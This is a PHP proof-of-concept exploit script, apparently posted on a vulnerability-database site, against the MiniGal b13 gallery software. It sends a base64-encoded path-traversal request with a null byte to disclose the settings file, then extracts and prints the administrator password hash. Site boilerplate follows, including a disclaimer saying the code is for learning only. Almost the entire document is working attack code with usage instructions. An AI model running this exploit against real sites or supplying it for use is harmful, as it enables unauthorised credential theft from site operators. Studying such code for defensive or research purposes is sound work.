<?php set_time_limit(0); function find_pass($data){ $tab = explode('$gallerycopyright = ',$data); $tab1 = explode('$version = "B13";',$tab[1]); $tab2 = explode('$adminpass = "',$tab1[0]); if($tab2[1]!=""){ echo("Vuln exploited enjoy !\n"); echo sleep(1); echo("Admin hash == [".substr($tab2[1],0,32)."]\n"); } else{ echo("Exploit failed!!!!"); } } function __send($pack,$host,$port){ $ret = ""; $desc = fsockopen($host,$port,$errno, $errstr, 30); if(!$desc){ echo("Socket say:($errno).[$errstr]"); return; } echo("Sending payload !!\n"); fwrite($desc,$pack); while(!feof($desc)){ $ret.=fgets($desc); } fclose($desc); find_pass($ret); } echo("\n=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n". "+ MiniGal b13 Source Code Disclosure +\n". "+ Alfons Luja +\n". "+ -------------------------------------------- +\n". "+ Usage poc.php path host port +\n". "+ ex: poc.php /press/ wwww.doda.net.pl 80 +\n". "+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=\n"); if($argc<3){ die("Path - host - Port - comprendo ?"); } $path = $argv[1]; $host = $argv[2]; $port = $argv[3]; $packet = "GET ".$path.base64_decode("aW5kZXgucGhwP2xpc3Q9Li4vc2V0dGluZ3MucGhwJTAwIEhUVFAvMS4x")."\r\n"; $packet .= "Host:".$host."\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; echo("\nConnecting to $host\n"); __send($packet,$host,$port); ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论